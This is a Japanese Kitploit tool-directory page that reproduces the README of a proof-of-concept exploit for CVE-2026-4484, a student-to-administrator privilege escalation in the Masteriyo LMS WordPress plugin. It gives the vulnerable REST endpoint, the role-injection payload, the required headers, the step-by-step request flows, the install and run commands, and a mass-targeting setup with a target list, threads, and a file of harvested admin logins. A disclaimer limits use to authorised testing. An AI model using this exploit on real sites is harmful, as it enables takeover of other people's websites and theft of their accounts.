Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-4484 — Masteriyo LMS <= 2.1.6 - 認証済み(Student+)ユーザーによる管理者への権限昇格を許す認可の欠如 | Kitploit
ツール/GitHubGitHub/nxploited/cve-2026-4484
認証と認可特権昇格脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミング
GitHubnxploited/cve-2026-4484

CVE-2026-4484

Masteriyo LMS <= 2.1.6 - 認証済み(Student+)ユーザーによる管理者への権限昇格を許す認可の欠如

リポジトリを見る
54ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-4484

Masteriyo LMS <= 2.1.6 - 認証済み(学生+)から管理者への特権昇格を引き起こす認可の欠落

Typing SVG


🔴 脆弱性の概要

CVE-2026-4484 — 認証済み特権昇格(学生 → 管理者)

説明:
WordPress用プラグイン Masteriyo LMS は、2.1.6 までの全バージョンにおいて 特権昇格 の脆弱性の影響を受けます。この脆弱性は InstructorsController::prepare_object_for_database 関数に起因し、REST APIリクエスト時にロール割り当てを適切に制限できません。学生レベルのアクセス権 しか持たない認証済み攻撃者は、Masteriyo REST APIエンドポイントに対して特別に細工されたPOSTリクエストを作成し — リクエストペイロードに "roles": ["administrator"] を注入することで — 自分のアカウントを静かにWordPress 管理者 に昇格させ、管理者による操作を一切必要とせずにサイト全体を乗っ取ることができます。


🛠️ ツール説明

これは、脆弱性のあるバージョンの Masteriyo LMS プラグインを実行しているWordPressインストールを対象とした Proof-of-Concept(PoC) エクスプロイトスクリプトです。このツールは2つの攻撃モードをサポートしています:

モード名前フローユースケース
1Nx_1登録 → ログイン → 昇格 → 管理者確認新規攻撃 — 既存アカウント不要

攻撃フロー

root@kitploit:~
[Register / Login as Student]
         ↓
[Fetch Dashboard Context — user_id + nonce]
         ↓
[POST /wp-json/masteriyo/v1/users/instructors/{id}]
[Payload: {"roles": ["administrator"]}]
         ↓
[Re-login with fresh session]
         ↓
[Verify /wp-admin access → confirmed Administrator]
         ↓
[Write to Login_admin.txt]

📋 要件

システム要件

  • Python 3.8 以上
  • Linux / Windows / macOS

Python依存パッケージ

root@kitploit:~
pip install requests urllib3 colorama

または requirements ファイルを使用:

root@kitploit:~
pip install -r requirements.txt

requirements.txt:

root@kitploit:~
requests>=2.28.0
urllib3>=1.26.0
colorama>=0.4.6

🚀 インストール

root@kitploit:~
# Clone the repository
git clone https://github.com/Nxploited/CVE-2026-4484.git
cd CVE-2026-4484

# Install dependencies
pip install -r requirements.txt

# Run the tool
python3 CVE-2026-4484.py

⚙️ 使用方法

基本的な実行

root@kitploit:~
python3 CVE-2026-4484.py

ツールは対話式のターミナルインターフェースを使用します — すべてのパラメータは実行時にプロンプトで入力されます。


🗂️ ターゲットリスト形式

ターゲットを1行に1つずつ記載したプレーンテキストファイル(例:list.txt)を作成します:

root@kitploit:~
https://target1.com
https://target2.com
http://target3.com/wordpress

🟥 モード1 — Nx_1(登録 + ログイン + 昇格)

対象に既存アカウントがない場合にこのモードを使用します。ツールは新しい学生アカウントを自動的に登録し、そのアカウントを昇格させます。

root@kitploit:~
Select mode (1=Nx_1, 2=Nx_2) [2]: 1
Targets list file (one host/URL per line) [list.txt]: list.txt
Threads (concurrent sites) [5]: 5
HTTP timeout (seconds) [10]: 10
Username to register (Nx_1) [Nxploited]: Nxploited
Email to use for registration+login (Nx_1) [[email protected]]: [email protected]
Password to use (Nx_1) [Nx_admin]: Nx_admin123!

自動実行される手順:

  1. GET /account/signup/ → 登録nonceを抽出
  2. POST /st/ → 学生として新規アカウントを登録
  3. GET /account/ → ログインnonceを抽出
  4. POST /wp-admin/admin-ajax.php → Masteriyo AJAX経由でログイン
  5. GET /account/#/dashboard → current_user_id + nonce を抽出
  6. POST /wp-json/masteriyo/v1/users/instructors/{id} → {"roles":["administrator"]} を送信
  7. 新しいセッションで再ログイン → 管理パネルへのアクセスを確認
  8. 確認できた対象を Login_admin.txt に書き込み

🟩 モード2 — Nx_2(ログイン + 昇格 — 既存アカウント)

対象に有効な学生またはインストラクターアカウントがすでにある場合にこのモードを使用します。

root@kitploit:~
Select mode (1=Nx_1, 2=Nx_2) [2]: 2
Targets list file (one host/URL per line) [list.txt]: list.txt
Threads (concurrent sites) [5]: 5
HTTP timeout (seconds) [10]: 10
Username or Email for login+escalation (Nx_2) [admin]: [email protected]
Password for that user: mypassword

自動実行される手順:

  1. GET /account/ → ログインnonceを抽出
  2. POST /wp-admin/admin-ajax.php → Masteriyo AJAX経由でログイン
  3. GET /account/#/dashboard → current_user_id + nonce を抽出
  4. POST /wp-json/masteriyo/v1/users/instructors/{id} → {"roles":["administrator"]} を送信
  5. 新しいセッションで再ログイン → 管理パネルへのアクセスを確認
  6. 確認できた対象を Login_admin.txt に書き込み

📁 出力ファイル

ファイル説明
Login_admin.txt確認済みの管理者昇格の全リスト

出力形式

root@kitploit:~
https://target.com/wp-login.php user:[email protected]|pass:Nx_admin123!

ターミナル出力例

root@kitploit:~
[OK]    https://target.com :: LOGIN OK :: success
[OK]    https://target.com :: DASHBOARD :: user_id=42 nonce=a1b2c3d4e5
[OK]    https://target.com :: ESCALATE SUCCESS :: user_id=42 username=nxploited roles=['administrator']
[OK]    https://target.com :: ADMIN SESSION VERIFIED (dashboard + plugin-install access).

🔍 技術的詳細

脆弱性のあるエンドポイント

root@kitploit:~
POST /wp-json/masteriyo/v1/users/instructors/{user_id}

エクスプロイトペイロード

root@kitploit:~
{
  "roles": ["administrator"]
}

必要なヘッダー

root@kitploit:~
Content-Type: application/json
X-WP-Nonce: <extracted_from_dashboard>

根本原因

Masteriyo LMS の InstructorsController::prepare_object_for_database 関数は、リクエストユーザーが edit_users または promote_users の権限を持っているかどうかを検証せずに、RESTリクエストボディの roles パラメータを処理します。このエンドポイントに到達できる認証済みユーザー(学生レベル以上)は、administrator を含む任意のロール値を送信でき、その値はWordPressのユーザーメタデータテーブルに直接永続化されます。


📡 連絡先と作者

作者: Nxploited (Khaled Alenazi)

 


⚠️ 法的免責事項

このツールは、教育目的および許可されたセキュリティ研究目的のみで提供されます。

作者である Nxploited (Khaled Alenazi) および本プロジェクトへのすべての貢献者は、明示的な書面による許可を得ていないシステムに対する本ツールの誤用や、本ソフトウェアの使用によって生じたいかなる損害についても、容認せず、支持せず、一切の責任を負いません。

  • ✅ 許可される行為: 自分が所有する、または明示的な書面によるテスト許可を得たシステムでの使用。
  • ❌ 禁止される行為: システム所有者からの事前の明示的な書面による許可なしに、いかなるシステムに対しても使用すること。

コンピュータシステムへの不正アクセスは違法であり、適用される法律に基づき処罰されます。これには、Computer Fraud and Abuse Act(CFAA)、Computer Misuse Act(CMA)、および世界各国の同等の法律が含まれますが、これらに限定されません。

本ツールを使用することにより、利用者はご自身の行動に対して単独で責任を負い、対象システムをテストする法的権限を有していることを確認したものとみなされます。

作者は、本ソフトウェアの使用または誤用から生じる直接的、間接的、付随的、または結果的な損害について、一切の責任を負いません。


© 2026 Nxploited (Khaled Alenazi) — 許可されたセキュリティ研究のみを目的としています。

ツールをダウンロード
項目詳細
CVE IDCVE-2026-4484
深刻度HIGH — CVSS v3.1スコア: 8.8
ベクターCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
影響を受けるソフトウェアMasteriyo LMS Plugin for WordPress
影響を受けるバージョン2.1.6 までの全バージョン
脆弱性タイプ特権昇格(ロール改ざん)
必要な認証あり — 学生レベル以上
CWECWE-269: Improper Privilege Management
2Nx_2ログイン → 昇格 → 管理者確認既存アカウントがある場合(学生/インストラクター)